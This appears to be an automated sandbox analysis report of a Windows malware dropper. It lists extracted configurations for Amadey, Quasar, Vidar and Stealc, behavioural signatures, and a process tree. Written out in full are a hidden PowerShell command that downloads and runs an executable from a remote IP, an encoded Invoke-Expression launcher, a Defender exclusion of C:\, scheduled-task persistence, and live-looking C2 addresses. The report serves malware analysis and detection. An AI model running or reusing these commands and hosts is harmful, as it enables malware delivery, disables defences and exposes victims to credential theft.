Analysis
max time kernel: 150s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20250314-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
submitted: 29/03/2025, 09:47
Static task: static1
Behavioral task: behavioral1
Sample: 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource: win7-20250207-en
Behavioral task: behavioral2
Sample: 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource: win10v2004-20250314-en
General
Target: 2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Size: 938KB
MD5: 5ec95a42b16d80c72d17cc6d0bac58de
SHA1: 9cfd9221606e1acfef1ea5f6f4bf88080822d5db
SHA256: f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b
SHA512: ca64237e9b54295b3162e26808d6c9acbef0640a996534425e21898b456e5117142bfe4d30473d2573ef42d08f0a85475d1cab63153e7b1b573011f67f735f0b
SSDEEP: 24576:dqDEvCTbMWu7rQYlBQcBiT6rprG8a0Xu:dTvC/MTQYxsWR7a0X
Malware Config
Extracted: http://176.113.115.7/mine/random.exe
Extracted: amadey 5.21 092155 http://176.113.115.6
install_dir: bb556cff4a
install_file: rapes.exe
strings_key: a131b127e996a898cd19ffb2d92e481b
url_paths: /Ni9kiput/index.php
Extracted: quasar 1.5.0 Office04 goku92ad.zapto.org:5000 a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a
encryption_key: BF72099FDBC6B48816529089CF1CF2CF86357D14
install_name: Client.exe
log_directory: Logs
reconnect_delay: 3000
startup_key: Quasar Modded Client Startup
subdirectory: SubDir
Extracted: lumma
Extracted: vidar 13.3 928af183c2a2807a3c0526e8c0c9369d
https://t.me/lw25chm
https://steamcommunity.com/profiles/76561199839170361
user_agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Extracted: stealc trump http://45.93.20.28
url_path: /85a1cacf11314eb8.php
Signatures
Amadey family
Detect Vidar Stealer 30 IoCs
Detects Healer, an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/2528-1344-0x00000000006A0000-0x0000000000AF6000-memory.dmp healer behavioral2/memory/2528-1345-0x00000000006A0000-0x0000000000AF6000-memory.dmp healer behavioral2/memory/2528-2187-0x00000000006A0000-0x0000000000AF6000-memory.dmp healer -
Healer family
Lumma family
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
Quasar family
Quasar payload 2 IoCs
resource yara_rule behavioral2/memory/5308-134-0x0000000008640000-0x0000000008794000-memory.dmp family_quasar behavioral2/memory/5308-135-0x00000000053A0000-0x00000000053BA000-memory.dmp family_quasar -
Stealc family
Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 202a17038f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE -
Blocklisted process makes network request 6 IoCs
flow pid Process 10 3852 powershell.exe 39 5308 powershell.exe 40 5308 powershell.exe 42 5308 powershell.exe 81 1436 powershell.exe 123 3536 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5128 powershell.exe 25264 powershell.exe 6116 powershell.exe 1892 powershell.exe 3624 powershell.exe 3404 PowerShell.exe 2032 powershell.exe 3996 powershell.exe 1816 powershell.exe 20216 powershell.exe 17908 powershell.exe 26540 powershell.exe 3852 powershell.exe 5308 powershell.exe 1436 powershell.exe 3536 powershell.exe -
Creates new service(s) 2 TTPs
Downloads MZ/PE file 13 IoCs
flow pid Process 81 1436 powershell.exe 46 2980 rapes.exe 46 2980 rapes.exe 46 2980 rapes.exe 46 2980 rapes.exe 10 3852 powershell.exe 35 2980 rapes.exe 165 1868 futors.exe 130 1868 futors.exe 63 1868 futors.exe 63 1868 futors.exe 82 1868 futors.exe 123 3536 powershell.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 1192 takeown.exe 5496 icacls.exe -
Stops running service(s) 4 TTPs
Uses browser remote debugging 2 TTPs 30 IoCs
Can be used to control the browser and steal sensitive information such as credentials and session cookies.
pid Process 5624 chrome.exe 4276 chrome.exe 25644 msedge.exe 18316 chrome.exe 2040 chrome.exe 544 msedge.exe 25076 chrome.exe 25588 chrome.exe 25580 chrome.exe 25748 msedge.exe 19948 chrome.exe 5612 msedge.exe 23108 chrome.exe 23072 chrome.exe 2156 msedge.exe 624 chrome.exe 3744 msedge.exe 2208 chrome.exe 25716 msedge.exe 860 chrome.exe 4816 chrome.exe 4752 msedge.exe 5404 msedge.exe 20156 chrome.exe 25268 chrome.exe 25732 msedge.exe 2924 chrome.exe 3104 chrome.exe 2912 chrome.exe 22892 chrome.exe -
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 202a17038f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 202a17038f.exe -
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation 22.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation Bell_Setup16.tmp Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation 22.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation rapes.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_07bc83df.cmd powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_07bc83df.cmd powershell.exe -
Executes dropped EXE 18 IoCs
pid Process 4884 Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE 2980 rapes.exe 5592 amnew.exe 1868 futors.exe 116 apple.exe 6020 22.exe 1224 22.exe 384 gron12321.exe 3108 accde9cdf4.exe 4016 v7942.exe 4888 TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE 4708 alex1dskfmdsf.exe 1532 483d2fa8a0d53818306efeb32d3.exe 2996 Bell_Setup16.exe 2284 202a17038f.exe 5172 Bell_Setup16.tmp 5636 Bell_Setup16.exe 4008 Bell_Setup16.tmp -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine 202a17038f.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE -
Loads dropped DLL 1 IoCs
pid Process 5760 regsvr32.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 1192 takeown.exe 5496 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\accde9cdf4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10367620101\\accde9cdf4.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10367630121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\202a17038f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10367950101\\202a17038f.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0007000000024360-211.dat autoit_exe behavioral2/files/0x000a00000002439d-1074.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 4884 Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE 2980 rapes.exe 4888 TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE 1532 483d2fa8a0d53818306efeb32d3.exe 2284 202a17038f.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 384 set thread context of 4424 384 gron12321.exe 154 PID 4016 set thread context of 5856 4016 v7942.exe 197 PID 4708 set thread context of 4396 4708 alex1dskfmdsf.exe 214 -
Drops file in Program Files directory 64 IoCs
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE File created C:\Windows\Tasks\futors.job amnew.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utility to control services on the system.
pid Process 2796 sc.exe 1680 sc.exe 2948 sc.exe 3240 sc.exe 3928 sc.exe 4912 sc.exe 4552 sc.exe 5680 sc.exe 852 sc.exe 3460 sc.exe 1892 sc.exe 5512 sc.exe 2592 sc.exe 4948 sc.exe 848 sc.exe 5100 sc.exe 844 sc.exe 548 sc.exe 2840 sc.exe 5772 sc.exe 2420 sc.exe 5888 sc.exe 3004 sc.exe 2580 sc.exe 4748 sc.exe 1964 sc.exe 2360 sc.exe 2112 sc.exe 4732 sc.exe 4776 sc.exe 3400 sc.exe 2744 sc.exe 4908 sc.exe 1188 sc.exe 5024 sc.exe 5468 sc.exe 2040 sc.exe 3764 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 7 IoCs
pid pid_target Process procid_target 18848 2528 WerFault.exe 380 18984 3052 WerFault.exe 378 24892 18916 WerFault.exe 393 25352 24920 WerFault.exe 415 11928 17156 WerFault.exe 482 24396 10320 WerFault.exe 502 18608 10376 WerFault.exe 501 -
System Location Discovery: System Language Discovery 1 TTPs 45 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 3556 timeout.exe 3764 timeout.exe 19684 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 3800 taskkill.exe 5824 taskkill.exe 4704 taskkill.exe 4452 taskkill.exe 5784 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133877153222343085" chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings rapes.exe -
Modifies registry key 1 TTPs 4 IoCs
pid Process 26964 reg.exe 5852 reg.exe 4912 reg.exe 19504 reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3544 schtasks.exe 4236 schtasks.exe 2160 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 5308 powershell.exe -
Suspicious behavior: EnumeratesProcesses 62 IoCs
pid Process 3852 powershell.exe 3852 powershell.exe 4884 Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE 4884 Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE 2980 rapes.exe 2980 rapes.exe 5308 powershell.exe 5308 powershell.exe 5128 powershell.exe 5128 powershell.exe 5128 powershell.exe 4424 MSBuild.exe 4424 MSBuild.exe 4424 MSBuild.exe 4424 MSBuild.exe 1436 powershell.exe 1436 powershell.exe 1436 powershell.exe 4888 TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE 4888 TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE 6116 powershell.exe 6116 powershell.exe 5856 MSBuild.exe 5856 MSBuild.exe 6116 powershell.exe 1892 powershell.exe 1892 powershell.exe 1892 powershell.exe 3624 powershell.exe 3624 powershell.exe 3624 powershell.exe 3536 powershell.exe 3536 powershell.exe 3536 powershell.exe 4396 MSBuild.exe 4396 MSBuild.exe 4396 MSBuild.exe 4396 MSBuild.exe 5856 MSBuild.exe 5856 MSBuild.exe 2924 chrome.exe 2924 chrome.exe 1532 483d2fa8a0d53818306efeb32d3.exe 1532 483d2fa8a0d53818306efeb32d3.exe 2284 202a17038f.exe 2284 202a17038f.exe 2284 202a17038f.exe 2284 202a17038f.exe 2284 202a17038f.exe 2284 202a17038f.exe 4008 Bell_Setup16.tmp 4008 Bell_Setup16.tmp 5760 regsvr32.exe 5760 regsvr32.exe 3996 powershell.exe 3996 powershell.exe 3996 powershell.exe 5856 MSBuild.exe 5856 MSBuild.exe 3404 PowerShell.exe 3404 PowerShell.exe 3404 PowerShell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 652 Process not Found 652 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe 2924 chrome.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
Suspicious use of FindShellTrayWindow 33 IoCs
pid  Process
2756  2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
2756  2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
2756  2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3108  accde9cdf4.exe
3108  accde9cdf4.exe
3108  accde9cdf4.exe
2924  chrome.exe
2924  chrome.exe
2924  chrome.exe
2924  chrome.exe
2924  chrome.exe
2924  chrome.exe
2924  chrome.exe
2924  chrome.exe
2924  chrome.exe
2924  chrome.exe
2924  chrome.exe
2924  chrome.exe
2924  chrome.exe
2924  chrome.exe
2924  chrome.exe
2924  chrome.exe
2924  chrome.exe
2924  chrome.exe
2924  chrome.exe
2924  chrome.exe
2924  chrome.exe
2924  chrome.exe
2924  chrome.exe
2924  chrome.exe
2924  chrome.exe
2924  chrome.exe
4008  Bell_Setup16.tmp
Suspicious use of SendNotifyMessage 6 IoCs
pid  Process
2756  2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
2756  2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
2756  2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3108  accde9cdf4.exe
3108  accde9cdf4.exe
3108  accde9cdf4.exe
Suspicious use of WriteProcessMemory 64 IoCs
description  pid  Process  procid_target
PID 2756 wrote to memory of 6108  2756  2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe  87
PID 2756 wrote to memory of 6108  2756  2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe  87
PID 2756 wrote to memory of 6108  2756  2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe  87
PID 2756 wrote to memory of 6072  2756  2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe  88
PID 2756 wrote to memory of 6072  2756  2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe  88
PID 2756 wrote to memory of 6072  2756  2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe  88
PID 6108 wrote to memory of 4236  6108  cmd.exe  90
PID 6108 wrote to memory of 4236  6108  cmd.exe  90
PID 6108 wrote to memory of 4236  6108  cmd.exe  90
PID 6072 wrote to memory of 3852  6072  mshta.exe  91
PID 6072 wrote to memory of 3852  6072  mshta.exe  91
PID 6072 wrote to memory of 3852  6072  mshta.exe  91
PID 3852 wrote to memory of 4884  3852  powershell.exe  100
PID 3852 wrote to memory of 4884  3852  powershell.exe  100
PID 3852 wrote to memory of 4884  3852  powershell.exe  100
PID 4884 wrote to memory of 2980  4884  Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE  101
PID 4884 wrote to memory of 2980  4884  Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE  101
PID 4884 wrote to memory of 2980  4884  Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE  101
PID 2980 wrote to memory of 4032  2980  rapes.exe  105
PID 2980 wrote to memory of 4032  2980  rapes.exe  105
PID 2980 wrote to memory of 4032  2980  rapes.exe  105
PID 4032 wrote to memory of 3276  4032  cmd.exe  107
PID 4032 wrote to memory of 3276  4032  cmd.exe  107
PID 4032 wrote to memory of 3276  4032  cmd.exe  107
PID 3276 wrote to memory of 5308  3276  cmd.exe  109
PID 3276 wrote to memory of 5308  3276  cmd.exe  109
PID 3276 wrote to memory of 5308  3276  cmd.exe  109
PID 5308 wrote to memory of 5128  5308  powershell.exe  110
PID 5308 wrote to memory of 5128  5308  powershell.exe  110
PID 5308 wrote to memory of 5128  5308  powershell.exe  110
PID 2980 wrote to memory of 5592  2980  rapes.exe  112
PID 2980 wrote to memory of 5592  2980  rapes.exe  112
PID 2980 wrote to memory of 5592  2980  rapes.exe  112
PID 5592 wrote to memory of 1868  5592  amnew.exe  113
PID 5592 wrote to memory of 1868  5592  amnew.exe  113
PID 5592 wrote to memory of 1868  5592  amnew.exe  113
PID 2980 wrote to memory of 116  2980  rapes.exe  114
PID 2980 wrote to memory of 116  2980  rapes.exe  114
PID 2980 wrote to memory of 116  2980  rapes.exe  114
PID 116 wrote to memory of 6020  116  apple.exe  115
PID 116 wrote to memory of 6020  116  apple.exe  115
PID 116 wrote to memory of 6020  116  apple.exe  115
PID 6020 wrote to memory of 3104  6020  22.exe  117
PID 6020 wrote to memory of 3104  6020  22.exe  117
PID 3104 wrote to memory of 1224  3104  cmd.exe  119
PID 3104 wrote to memory of 1224  3104  cmd.exe  119
PID 3104 wrote to memory of 1224  3104  cmd.exe  119
PID 1224 wrote to memory of 5800  1224  22.exe  120
PID 1224 wrote to memory of 5800  1224  22.exe  120
PID 5800 wrote to memory of 4552  5800  cmd.exe  122
PID 5800 wrote to memory of 4552  5800  cmd.exe  122
PID 5800 wrote to memory of 2580  5800  cmd.exe  123
PID 5800 wrote to memory of 2580  5800  cmd.exe  123
PID 5800 wrote to memory of 3556  5800  cmd.exe  124
PID 5800 wrote to memory of 3556  5800  cmd.exe  124
PID 5800 wrote to memory of 3240  5800  cmd.exe  126
PID 5800 wrote to memory of 3240  5800  cmd.exe  126
PID 5800 wrote to memory of 4748  5800  cmd.exe  127
PID 5800 wrote to memory of 4748  5800  cmd.exe  127
PID 5800 wrote to memory of 1192  5800  cmd.exe  128
PID 5800 wrote to memory of 1192  5800  cmd.exe  128
PID 5800 wrote to memory of 5496  5800  cmd.exe  129
PID 5800 wrote to memory of 5496  5800  cmd.exe  129
PID 5800 wrote to memory of 1964  5800  cmd.exe  130
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
Process tree, indented by nesting level. Each entry shows the image path, the command line and the PID, followed by the behaviours observed for that process.

[level 1] C:\Users\Admin\AppData\Local\Temp\2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
  PID: 2756
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  [level 2] C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c schtasks /create /tn yDQgJmaxz4C /tr "mshta C:\Users\Admin\AppData\Local\Temp\OJg06BvQe.hta" /sc minute /mo 25 /ru "Admin" /f
    PID: 6108
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    [level 3] C:\Windows\SysWOW64\schtasks.exe
      Command line: schtasks /create /tn yDQgJmaxz4C /tr "mshta C:\Users\Admin\AppData\Local\Temp\OJg06BvQe.hta" /sc minute /mo 25 /ru "Admin" /f
      PID: 4236
      - System Location Discovery: System Language Discovery
      - Scheduled Task/Job: Scheduled Task
  [level 2] C:\Windows\SysWOW64\mshta.exe
    Command line: mshta C:\Users\Admin\AppData\Local\Temp\OJg06BvQe.hta
    PID: 6072
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    [level 3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
      PID: 3852
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Downloads MZ/PE file
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      [level 4] C:\Users\Admin\AppData\Local\Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE
        Command line: "C:\Users\Admin\AppData\Local\Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE"
        PID: 4884
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Checks BIOS information in registry
        - Checks computer location settings
        - Executes dropped EXE
        - Identifies Wine through registry keys
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Drops file in Windows directory
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory
        [level 5] C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
          PID: 2980
          - Identifies VirtualBox via ACPI registry values (likely anti-VM)
          - Downloads MZ/PE file
          - Checks BIOS information in registry
          - Checks computer location settings
          - Executes dropped EXE
          - Identifies Wine through registry keys
          - Adds Run key to start application
          - Suspicious use of NtSetInformationThreadHideFromDebugger
          - System Location Discovery: System Language Discovery
          - Modifies registry class
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of WriteProcessMemory
          [level 6] C:\Windows\SysWOW64\cmd.exe
            Command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10364621121\2GF9eeb.cmd"
            PID: 4032
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory
            [level 7] C:\Windows\SysWOW64\cmd.exe
              Command line: C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10364621121\2GF9eeb.cmd"
              PID: 3276
              - System Location Discovery: System Language Discovery
              - Suspicious use of WriteProcessMemory
              [level 8] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression"
                PID: 5308
                - Blocklisted process makes network request
                - Command and Scripting Interpreter: PowerShell
                - Drops startup file
                - System Location Discovery: System Language Discovery
                - Suspicious behavior: AddClipboardFormatListener
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                - Suspicious use of WriteProcessMemory
                [level 9] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                  PID: 5128
                  - Command and Scripting Interpreter: PowerShell
                  - System Location Discovery: System Language Discovery
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
          [level 6] C:\Users\Admin\AppData\Local\Temp\10366310101\amnew.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\10366310101\amnew.exe"
            PID: 5592
            - Checks computer location settings
            - Executes dropped EXE
            - Drops file in Windows directory
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory
            [level 7] C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
              Command line: "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
              PID: 1868
              - Downloads MZ/PE file
              - Checks computer location settings
